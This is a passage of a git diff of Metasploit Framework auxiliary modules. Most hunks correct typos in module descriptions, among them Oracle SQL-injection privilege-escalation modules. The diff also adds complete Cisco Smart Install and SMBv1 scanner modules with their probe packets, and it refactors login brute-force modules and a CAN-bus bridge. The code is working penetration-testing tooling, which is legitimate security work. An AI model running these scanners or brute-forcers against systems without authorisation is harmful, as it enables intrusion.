key. Note that authentication is required in order to successfully grab the LDAP credentials, and you need at least a read account. Version 10.6.0-7 and earlier are affected diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index d4730f45b2..33fcc2e00e 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of - Nozvell Zenworks Asset Managmment, including the database credentials in clear text. + Novell Zenworks Asset Managment, including the database credentials in clear text. This module has been successfully tested on Novell ZENworks Asset Management 7.5. }, 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/misc/cisco_smart_install.rb b/modules/auxiliary/scanner/misc/cisco_smart_install.rb new file mode 100644 index 0000000000..e8ab34009b --- /dev/null +++ b/modules/auxiliary/scanner/misc/cisco_smart_install.rb @@ -0,0 +1,88 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Identify Cisco Smart Install endpoints', + 'Description' => %q( + This module attempts to connect to the specified Cisco Smart Install port + and determines if it speaks the Smart Install Protocol. Exposure of SMI + to untrusted networks can allow complete compromise of the switch. + ), + 'Author' => 'Jon Hart ', + 'References' => + [ + ['URL', 'https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html'], + ['URL', 'https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature'], + ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi'], + ['URL', 'https://github.com/Cisco-Talos/smi_check'], + ['URL', 'https://github.com/Sab0tag3d/SIET'] + + ], + 'License' => MSF_LICENSE + ) + ) + + register_options( + [ + Opt::RPORT(4786) + ] + ) + end + + # thanks to https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 + SMI_PROBE = "\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00".freeze + SMI_RE = /^\x00{3}\x04\x00{7}\x03\x00{3}\x08\x00{3}\x01\x00{4}$/ + def smi? + sock.puts(SMI_PROBE) + response = sock.get_once(-1) + if response + if SMI_RE.match?(response) + print_good("Fingerprinted the Cisco Smart Install protocol") + return true + else + vprint_status("No match for '#{response}'") + end + else + vprint_status("No response") + end + end + + def run_host(_ip) + begin + connect + return unless smi? + rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, \ + ::Errno::ETIMEDOUT, ::Timeout::Error, ::EOFError => e + vprint_error("error while connecting and negotiating Cisco Smart Install: #{e}") + return + ensure + disconnect + end + + service = report_service( + host: rhost, + port: rport, + proto: 'tcp', + name: 'Smart Install' + ) + + report_vuln( + host: rhost, + service: service, + name: name, + info: "Fingerprinted the Cisco Smart Install Protocol", + refs: references, + exploited_at: Time.now.utc + ) + end +end diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index cfa74bfb5b..eb749caced 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary executable in order to retrieve passwords, allowing remote attackers to take administrative control over the device. Other similar IP Cameras such as Edimax, Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested. - The protocol deisgn issue also allows attackers to reset passwords on the device. + The protocol design issue also allows attackers to reset passwords on the device. }, 'Author' => 'Ben Schmidt', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index b5d60ac0a8..22d31ab354 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %Q{ This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such - as master,model,msdb, and tempdb. The module will create + as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading. }, diff --git a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb index 664e90f57e..6d103377aa 100644 --- a/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb @@ -13,23 +13,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'Nessus NTP Login Utility', - 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(1241), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'Nessus NTP Login Utility', + 'Description' => 'This module attempts to authenticate to a Nessus NTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(1241), + OptBool.new('BLANK_PASSWORDS', "Try blank passwords for all users") + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb index e54d611a98..9d8a4532b6 100644 --- a/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'OpenVAS gsad Web Interface Login Utility', 'Description' => %q{ - This module simply attempts to login to a OpenVAS gsad interface + This module simply attempts to login to an OpenVAS gsad interface using a specific user/pass. }, 'Author' => [ 'Vlatko Kosturjak ' ], diff --git a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb index 5bf19b584c..86da3f4c9f 100644 --- a/modules/auxiliary/scanner/openvas/openvas_omp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_omp_login.rb @@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OMP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9390), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OMP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9390), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb index 26a8ce7937..52941770b7 100644 --- a/modules/auxiliary/scanner/openvas/openvas_otp_login.rb +++ b/modules/auxiliary/scanner/openvas/openvas_otp_login.rb @@ -10,23 +10,18 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute def initialize - super( - 'Name' => 'OpenVAS OTP Login Utility', - 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', - 'Author' => [ 'Vlatko Kosturjak ' ], - 'License' => MSF_LICENSE - ) - register_options( - [ - Opt::RPORT(9391), - OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) - ]) - - register_advanced_options( - [ - OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]), - OptString.new('SSLVersion', [ true, " Specify the version of SSL that should be used", "TLS1"]) - ]) + super( + 'Name' => 'OpenVAS OTP Login Utility', + 'Description' => 'This module attempts to authenticate to an OpenVAS OTP service.', + 'Author' => [ 'Vlatko Kosturjak ' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9391), + OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]) + ] + ) end def run_host(ip) diff --git a/modules/auxiliary/scanner/oracle/emc_sid.rb b/modules/auxiliary/scanner/oracle/emc_sid.rb index a866ab040e..14f68f1681 100644 --- a/modules/auxiliary/scanner/oracle/emc_sid.rb +++ b/modules/auxiliary/scanner/oracle/emc_sid.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Oracle Enterprise Manager Control SID Discovery', 'Description' => %q{ - This module makes a request to the Oracle Enterprise Manager Control Console + This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID. }, 'References' => diff --git a/modules/auxiliary/scanner/oracle/sid_brute.rb b/modules/auxiliary/scanner/oracle/sid_brute.rb index a10678f482..1643a4f801 100644 --- a/modules/auxiliary/scanner/oracle/sid_brute.rb +++ b/modules/auxiliary/scanner/oracle/sid_brute.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle TNS Listener SID Bruteforce', 'Description' => %q{ - This module queries the TNS listner for a valid Oracle database + This module queries the TNS listener for a valid Oracle database instance name (also known as a SID). Any response other than a "reject" will be considered a success. If a specific SID is provided, that SID will be attempted. Otherwise, diff --git a/modules/auxiliary/scanner/oracle/sid_enum.rb b/modules/auxiliary/scanner/oracle/sid_enum.rb index d5ad4c69f3..b41958aa87 100644 --- a/modules/auxiliary/scanner/oracle/sid_enum.rb +++ b/modules/auxiliary/scanner/oracle/sid_enum.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle TNS Listener SID Enumeration', 'Description' => %q{ - This module simply queries the TNS listner for the Oracle SID. + This module simply queries the TNS listener for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed. }, diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 0efe4491ea..905a355a71 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module checks the server for vulnerabilities like TNS Poison. Module sends a server a packet with command to register new TNS Listener and checks for a response indicating an error. If the registration is errored, the target is not - vulnearble. Otherwise, the target is vulnerable to malicious registrations. + vulnerable. Otherwise, the target is vulnerable to malicious registrations. }, 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => diff --git a/modules/auxiliary/scanner/oracle/xdb_sid.rb b/modules/auxiliary/scanner/oracle/xdb_sid.rb index a2b678b554..eaf2cdf50a 100644 --- a/modules/auxiliary/scanner/oracle/xdb_sid.rb +++ b/modules/auxiliary/scanner/oracle/xdb_sid.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Oracle XML DB SID Discovery', 'Description' => %q{ - This module simply makes a authenticated request to retrieve + This module simply makes an authenticated request to retrieve the sid from the Oracle XML DB httpd server. }, 'References' => diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 9d987e5b17..20b95e7c14 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'PostgreSQL Version Probe', 'Description' => %q{ - Enumerates the verion of PostgreSQL servers. + Enumerates the version of PostgreSQL servers. }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 8af75c637c..96687a8ac5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'SAP Management Console getStartProfile', 'Description' => %q{ - This module simply attempts to acces the SAP startup profile + This module simply attempts to access the SAP startup profile through the SAP Management Console SOAP Interface. }, 'References' => diff --git a/modules/auxiliary/scanner/scada/modbus_findunitid.rb b/modules/auxiliary/scanner/scada/modbus_findunitid.rb index ffb1b27239..9643be880c 100644 --- a/modules/auxiliary/scanner/scada/modbus_findunitid.rb +++ b/modules/auxiliary/scanner/scada/modbus_findunitid.rb @@ -13,10 +13,10 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line (RS232) async protocol, and later transformed - to IP, which is called ModbusTCP. default tcpport is 502. + to IP, which is called ModbusTCP. default tcp port is 502. This module sends a command (0x04, read input register) to the modbus endpoint. - If this command is sent to the correct unit-id, it returns with the same funcion-id. + If this command is sent to the correct unit-id, it returns with the same function-id. if not, it should be added 0x80, so that it sys 0x84, and an exception-code follows which do not interest us. This does not always happen, but at least the first 4 bytes in the return-packet should be exact the same as what was sent. diff --git a/modules/auxiliary/scanner/smb/smb1.rb b/modules/auxiliary/scanner/smb/smb1.rb new file mode 100644 index 0000000000..0e52f9f879 --- /dev/null +++ b/modules/auxiliary/scanner/smb/smb1.rb @@ -0,0 +1,76 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + # Exploit mixins should go first + include Msf::Exploit::Remote::Tcp + + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Aliases for common classes + SIMPLE = Rex::Proto::SMB::SimpleClient + XCEPT = Rex::Proto::SMB::Exceptions + CONST = Rex::Proto::SMB::Constants + + def initialize + super( + 'Name' => 'SMBv1 Protocol Detection', + 'Description' => 'Detect systems that support the SMBv1 protocol', + 'Author' => 'Chance Johnson @loftwing', + 'License' => MSF_LICENSE + ) + + register_options([ Opt::RPORT(445) ]) + end + + # Modified from smb2 module by @hdm + # Fingerprint a single host + def run_host(ip) + begin + connect + + # Only accept NT LM 0.12 dialect and WfW3.0 + dialects = ['PC NETWORK PROGRAM 1.0', + 'LANMAN1.0', + 'Windows for Workgroups 3.1a', + 'LM1.2X002', + 'LANMAN2.1', + 'NT LM 0.12'] + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') + + pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct + pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE + pkt['Payload']['SMB'].v['Flags1'] = 0x08 + pkt['Payload']['SMB'].v['Flags2'] = 0xc801 + pkt['Payload'].v['Payload'] = data + + pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000) + pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000) + + sock.put(pkt.to_s) + res = sock.get_once + # expecting \xff instead of \xfe + if res && res.index("\xffSMB") + print_good("#{ip} supports SMBv1 dialect.") + report_note( + host: ip, + proto: 'tcp', + sname: 'smb1', + port: rport, + type: "supports SMB 1" + ) + end + rescue ::Rex::ConnectionError + rescue EOFError + rescue Errno::ECONNRESET + rescue ::Exception => e + print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}") + ensure + disconnect + end + end +end diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index bbf6ebd487..f68bfba654 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'HP LaserJet Printer SNMP Enumeration', 'Description' => %q{ This module allows enumeration of files previously printed. - It provides details as filename, client, timestamp and username informations. + It provides details as filename, client, timestamp and username information. The default community used is "public". }, 'References' => diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 11686cd943..474caddd27 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary ) end - rescue ::Rex::ConnectionError + rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e + print_error("A network issue has occurred: #{e.message}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue Timeout::Error print_error("#{target_host}:#{rport} Timed out after #{to} seconds") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue ::Exception => e print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") ensure disconnect end diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index 43070c5ece..1300dc4816 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %Q{ This module uses supplied login credentials to connect to VMWare via the web interface. It then searches through the datastores looking for screenshots. - It will downlaod any screenshots it finds and save them as loot. + It will download any screenshots it finds and save them as loot. }, 'Author' => ['theLightCosine'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index 2f5487baff..fc0a043bbe 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary if you wish to load just Adobe Flash exploits, then you can set Include to 'adobe_flash'. The EXCLUDE_PATTERN option will ignore exploits. For example, if you don't want any Adobe Flash - exploits, you can set this. Also note that the Exclude option will always be evaludated + exploits, you can set this. Also note that the Exclude option will always be evaluated after the Include option. The MaxExploitCount option specifies the max number of exploits to load by Browser Autopwn. diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 51955cb34c..f51b978acc 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary To use this module you will need to send an initial ICMP echo request containing the specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or - a random filename can be assisnged). All data received from this source will automatically + a random filename can be assigned). All data received from this source will automatically be added to the receive buffer until an ICMP echo request containing a specific end trigger (defaults to '^EOL') is received. diff --git a/modules/auxiliary/server/local_hwbridge.rb b/modules/auxiliary/server/local_hwbridge.rb index 277f356b2e..ce12bfef1b 100644 --- a/modules/auxiliary/server/local_hwbridge.rb +++ b/modules/auxiliary/server/local_hwbridge.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report - HWBRIDGE_API_VERSION = "0.0.1" + HWBRIDGE_API_VERSION = "0.0.4" def initialize(info = {}) super(update_info(info, @@ -170,13 +170,24 @@ class MetasploitModule < Msf::Auxiliary # srcid = hex id of the sent packet # dstid = hex id of the return packets # data = string of hex bytes to send - # timeout = optional int to timeout on lack of response - # maxpkts = max number of packets to recieve - def isotp_send_and_wait(bus, srcid, dstid, data, timeout = 2000, maxpkts = 3) + # OPT = Options + # timeout = optional int to timeout on lack of response + # maxpkts = max number of packets to recieve + # padding = append bytes to end of packet (Doesn't increase reported ISO-TP size) + # fc = flow control, if true forces flow control packets + def isotp_send_and_wait(bus, srcid, dstid, data, opt = {}) result = {} result["Success"] = false srcid = srcid.to_i(16).to_s(16) dstid = dstid.to_i(16).to_s(16) + timeout = 2000 + maxpkts = 3 + flowcontrol = nil + padding = nil + timeout = opt['TIMEOUT'] if opt.key? 'TIMEOUT' + maxpkts = opt['MAXPKTS'] if opt.key? 'MAXPKTS' + padding = opt['PADDING'] if opt.key? 'PADDING' + flowcontrol = opt['FC'] if opt.key? 'FC' bytes = data.scan(/../) if bytes.size > 8 print_error("Data section currently has to be less than 8 bytes") @@ -185,6 +196,10 @@ class MetasploitModule < Msf::Auxiliary sz = "%02x" % bytes.size bytes = sz + bytes.join end + if padding && bytes.size < 16 # 16 == 8 bytes because of ascii size + padding = "%02x" % padding.to_i + bytes += ([ padding ] * (16 - bytes.size)).join + end # Should we ever require isotpsend for this? `which cansend` unless $?.success? @@ -193,15 +208,43 @@ class MetasploitModule < Msf::Auxiliary end @can_interfaces.each do |can| if can == bus - candump(bus, dstid, timeout, maxpkts) - system("cansend #{bus} #{srcid}##{bytes}") - @packets_sent += 1 - @last_sent = Time.now.to_i - result["Success"] = true if $?.success? - result["Packets"] = [] - $candump_sniffer.join - unless @pkt_response.empty? - result = @pkt_response + if flowcontrol + candump(bus, dstid, timeout, 1) + system("cansend #{bus} #{srcid}##{bytes}") + @packets_sent += 1 + @last_sent = Time.now.to_i + result["Success"] = true if $?.success? + result["Packets"] = [] + $candump_sniffer.join + unless @pkt_response.empty? + result = @pkt_response + if result.key?("Packets") && result["Packets"].size > 0 && result["Packets"][0].key?("DATA") + if result["Packets"][0]["DATA"][0] == "10" + system("cansend #{bus} #{srcid}#3000000000000000") + candump(bus, dstid, timeout, maxpkts) + @packets_sent += 1 + @last_sent = Time.now.to_i + $candump_sniffer.join + unless @pkt_response.empty? + if @pkt_response.key?("Packets") && @pkt_response["Packets"].size > 0 + result["Packets"] += @pkt_response["Packets"] + end + end + end + end + end + + else + candump(bus, dstid, timeout, maxpkts) + system("cansend #{bus} #{srcid}##{bytes}") + @packets_sent += 1 + @last_sent = Time.now.to_i + result["Success"] = true if $?.success? + result["Packets"] = [] + $candump_sniffer.join + unless @pkt_response.empty? + result = @pkt_response + end end end end @@ -252,11 +295,12 @@ class MetasploitModule < Msf::Auxiliary elsif request.uri =~ /automotive\/(\w+)\/isotpsend_and_wait\?srcid=(\w+)&dstid=(\w+)&data=(\w+)/ bus = $1; srcid = $2; dstid = $3; data = $4 print_status("Request to send ISO-TP packet and wait for response #{srcid}##{data} => #{dstid}") if datastore['VERBOSE'] - timeout = 1500 - maxpkts = 3 - timeout = $1 if request.uri =~ /&timeout=(\d+)/ - maxpkts = $1 if request.uri =~ /&maxpkts=(\d+)/ - send_response_html(cli, isotp_send_and_wait(bus, srcid, dstid, data, timeout, maxpkts).to_json(), { 'Content-Type' => 'application/json' }) + opt = {} + opt['TIMEOUT'] = $1 if request.uri =~ /&timeout=(\d+)/ + opt['MAXPKTS'] = $1 if request.uri =~ /&maxpkts=(\d+)/ + opt['PADDING'] = $1 if request.uri =~ /&padding=(\d+)/ + opt['FC'] = true if request.uri =~ /&fc=true/i + send_response_html(cli, isotp_send_and_wait(bus, srcid, dstid, data, opt).to_json(), { 'Content-Type' => 'application/json' }) else send_response_html(cli, not_supported().to_json(), { 'Content-Type' => 'application/json' }) end diff --git a/modules/auxiliary/spoof/dns/compare_results.rb b/modules/auxiliary/spoof/dns/compare_results.rb index 482d2d38f5..9374bf196a 100644 --- a/modules/auxiliary/spoof/dns/compare_results.rb +++ b/modules/auxiliary/spoof/dns/compare_results.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, - but can also be used to detect geo-location loadbalancing. + but can also be used to detect geo-location load balancing. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb index 7f43c01027..8fc8199c4f 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function. This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and 10g up to 10.1.0.4. diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index caf95194d4..ffee9bcb8e 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 327c3b38aa..68b4d03eaa 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index 6c7f02745a..f1bd69bee4 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an sql injection + This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/sqli/oracle/droptable_trigger.rb b/modules/auxiliary/sqli/oracle/droptable_trigger.rb index 144999861c..54b8b8f357 100644 --- a/modules/auxiliary/sqli/oracle/droptable_trigger.rb +++ b/modules/auxiliary/sqli/oracle/droptable_trigger.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger', 'Description' => %q{ - This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in + This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack). }, diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index c085d9a1e4..1e00a3cacb 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -10,8 +10,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting - an sql injection bug in the SYS.LT.FINDRICSET package via Evil + This module will escalate an Oracle DB user to DBA by exploiting + a sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007. diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb 